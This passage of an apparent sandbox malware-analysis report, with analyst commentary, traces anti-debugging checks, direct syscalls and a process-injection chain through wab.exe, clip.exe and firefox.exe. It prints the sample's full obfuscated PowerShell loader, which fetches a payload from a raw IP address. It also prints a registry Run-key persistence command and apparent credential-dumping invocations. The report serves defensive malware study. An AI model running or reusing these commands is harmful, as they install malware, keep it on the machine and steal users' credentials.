              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A7019F mov eax, dword ptr fs:[00000030h]27_2_22A7019F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC61E5 mov eax, dword ptr fs:[00000030h]27_2_22AC61E5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A151EF mov eax, dword ptr fs:[00000030h]27_2_22A151EF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A971F9 mov esi, dword ptr fs:[00000030h]27_2_22A971F9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A201F8 mov eax, dword ptr fs:[00000030h]27_2_22A201F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AC51CB mov eax, dword ptr fs:[00000030h]27_2_22AC51CB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB61C3 mov eax, dword ptr fs:[00000030h]27_2_22AB61C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB61C3 mov eax, dword ptr fs:[00000030h]27_2_22AB61C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2D1D0 mov eax, dword ptr fs:[00000030h]27_2_22A2D1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A2D1D0 mov ecx, dword ptr fs:[00000030h]27_2_22A2D1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F51ED mov eax, dword ptr fs:[00000030h]27_2_229F51ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov ecx, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6E1D0 mov eax, dword ptr fs:[00000030h]27_2_22A6E1D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A20124 mov eax, dword ptr fs:[00000030h]27_2_22A20124
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EB136 mov eax, dword ptr fs:[00000030h]27_2_229EB136
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F1131 mov eax, dword ptr fs:[00000030h]27_2_229F1131
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F1131 mov eax, dword ptr fs:[00000030h]27_2_229F1131
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov ecx, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov eax, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov eax, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A9A118 mov eax, dword ptr fs:[00000030h]27_2_22A9A118
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22AB0115 mov eax, dword ptr fs:[00000030h]27_2_22AB0115
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EC156 mov eax, dword ptr fs:[00000030h]27_2_229EC156
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F6154 mov eax, dword ptr fs:[00000030h]27_2_229F6154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F6154 mov eax, dword ptr fs:[00000030h]27_2_229F6154
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229F7152 mov eax, dword ptr fs:[00000030h]27_2_229F7152
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A89179 mov eax, dword ptr fs:[00000030h]27_2_22A89179
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229E9148 mov eax, dword ptr fs:[00000030h]27_2_229E9148
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_229EF172 mov eax, dword ptr fs:[00000030h]27_2_229EF172
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code functions reading fs:[00000030h]. In a 32-bit process fs:[30h] is the PEB pointer; repeated PEB reads spread across this many routines are typical of PEB-based anti-debug checks (BeingDebugged, NtGlobalFlag) and of shellcode that walks PEB->Ldr to resolve APIs without an import table. Reads per function:
                27_2_229EF172 mov eax, dword ptr fs:[00000030h] (18)
                27_2_22A84144 mov eax, dword ptr fs:[00000030h] (4); mov ecx, dword ptr fs:[00000030h] (1)
                27_2_22A88158 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22AC5152 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A2C6A6 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F4690 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A266B0 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A7368C mov eax, dword ptr fs:[00000030h] (4)
                27_2_229E76B2 mov eax, dword ptr fs:[00000030h] (3)
                27_2_229ED6AA mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A1D6E0 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A836EE mov eax, dword ptr fs:[00000030h] (6)
                27_2_22A236EF mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A6E6F2 mov eax, dword ptr fs:[00000030h] (4)
                27_2_22A706F1 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22AAD6F0 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229FB6C0 mov eax, dword ptr fs:[00000030h] (6)
                27_2_22A2A6C7 mov ebx, dword ptr fs:[00000030h] (1); mov eax, dword ptr fs:[00000030h] (1)
                27_2_22AB16CC mov eax, dword ptr fs:[00000030h] (4)
                27_2_22AAF6C7 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A216CF mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A26620 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A28620 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A0E627 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F3616 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22AC5636 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A2F603 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A21607 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A0260B mov eax, dword ptr fs:[00000030h] (7)
                27_2_22A6E609 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F262C mov eax, dword ptr fs:[00000030h] (1)
                27_2_229EF626 mov eax, dword ptr fs:[00000030h] (9)
                27_2_22A32619 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A2A660 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A29660 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22AB866E mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A22674 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A0C640 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A7F7AF mov eax, dword ptr fs:[00000030h] (5)
                27_2_22A797A9 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A1D7B0 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22AC37B6 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22AAF78A mov eax, dword ptr fs:[00000030h] (1)
                27_2_229EF7BA mov eax, dword ptr fs:[00000030h] (9)
                27_2_229F07AF mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A7E7E1 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A127ED mov eax, dword ptr fs:[00000030h] (3)
                27_2_229FC7C0 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F57C0 mov eax, dword ptr fs:[00000030h] (3)
                27_2_229F47FB mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A707C3 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229FD7E0 mov ecx, dword ptr fs:[00000030h] (1)
                27_2_22A0F720 mov eax, dword ptr fs:[00000030h] (3)
                27_2_22AB972B mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A2C720 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22AAF72E mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F0710 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22ACB73C mov eax, dword ptr fs:[00000030h] (4)
                27_2_22A6C730 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A25734 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F7703 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F5702 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A2273C mov eax, dword ptr fs:[00000030h] (2); mov ecx, dword ptr fs:[00000030h] (1)
                27_2_22A2C700 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F973A mov eax, dword ptr fs:[00000030h] (2)
                27_2_229E9730 mov eax, dword ptr fs:[00000030h] (2)
                27_2_22A20710 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A2F71F mov eax, dword ptr fs:[00000030h] (2)
                27_2_229F3720 mov eax, dword ptr fs:[00000030h] (1)
                27_2_229F0750 mov eax, dword ptr fs:[00000030h] (1)
                27_2_22A00770 mov eax, dword ptr fs:[00000030h] (7)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB724E GetProcessHeap
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB60E2 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB2B1C SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_21CB2639 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
              Note: the three 11_2_ routines above are the MSVC runtime's standard fail-fast / security-failure path (IsProcessorFeaturePresent, then IsDebuggerPresent and the exception-filter pair before TerminateProcess) and appear in benign binaries as well; the fs:[30h] reads and the direct syscalls in the next section carry more weight as anti-analysis evidence.

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_2084.amsi.csv, type: OTHER
              Source: Yara match | File source: amsi32_504.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2084, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4972, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 504, type: MEMORYSTR
              Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe | Direct syscalls, with the address each was issued from:
                NtResumeThread: Direct from: 0x773836AC
                NtMapViewOfSection: Direct from: 0x77382D1C
                NtWriteVirtualMemory: Direct from: 0x77382E3C
                NtProtectVirtualMemory: Direct from: 0x77382F9C
                NtSetInformationThread: Direct from: 0x773763F9
                NtCreateMutant: Direct from: 0x773835CC
                NtNotifyChangeKey: Direct from: 0x77383C2C
                NtSetInformationProcess: Direct from: 0x77382C5C
                NtCreateUserProcess: Direct from: 0x7738371C
                NtQueryInformationProcess: Direct from: 0x77382C26
                NtResumeThread: Direct from: 0x77382FBC
                NtWriteVirtualMemory: Direct from: 0x7738490C
                NtOpenKeyEx: Direct from: 0x77383C9C
                NtReadFile: Direct from: 0x77382ADC
                NtAllocateVirtualMemory: Direct from: 0x77382BFC
                NtDelayExecution: Direct from: 0x77382DDC
                NtQuerySystemInformation: Direct from: 0x77382DFC
                NtOpenSection: Direct from: 0x77382E0C
                NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                NtQuerySystemInformation: Direct from: 0x773848CC
                NtReadVirtualMemory: Direct from: 0x77382E8C
                NtCreateKey: Direct from: 0x77382C6C
                NtClose: Direct from: 0x77382B6C
                NtAllocateVirtualMemory: Direct from: 0x773848EC
                NtQueryAttributesFile: Direct from: 0x77382E6C
                NtSetInformationThread: Direct from: 0x77382B4C
                NtQueryInformationToken: Direct from: 0x77382CAC
                NtOpenKeyEx: Direct from: 0x77382B9C
                NtQueryValueKey: Direct from: 0x77382BEC
                NtDeviceIoControlFile: Direct from: 0x77382AEC
                NtCreateFile: Direct from: 0x77382FEC
                NtOpenFile: Direct from: 0x77382DCC
              Note: the report prints only the address the syscall was issued from; every entry above sits in the 0x7737xxxx-0x7738xxxx range, and the page does not say which module, if any, backs that range in this process. Check the process's module list before attributing EDR evasion: a call issued from ntdll's own stubs and a call issued from a hand-rolled stub in an unbacked region are different findings. The set itself (allocate, write, protect, map section, set thread information, resume thread, create user process) is the sequence a remote-injection routine needs.
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write (3 times)
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe protection: execute and read and write
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe protection: read write
              Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\clip.exe | Thread register set: target process: 2264
              Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3D50000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2ABFC78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3050000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 303F908
              Read together, these entries give the injection chain: powershell.exe writes into wab.exe; wab.exe maps execute/read/write sections into itself, into the dropped sofUaEnRVTAexkDmTx.exe and into clip.exe; clip.exe then maps sections into sofUaEnRVTAexkDmTx.exe and firefox.exe, sets the thread context of PID 2264 and queues an APC in the dropped executable. Each hop uses a signed Windows binary (wab.exe, clip.exe) as the host for the next stage.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.n
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs"
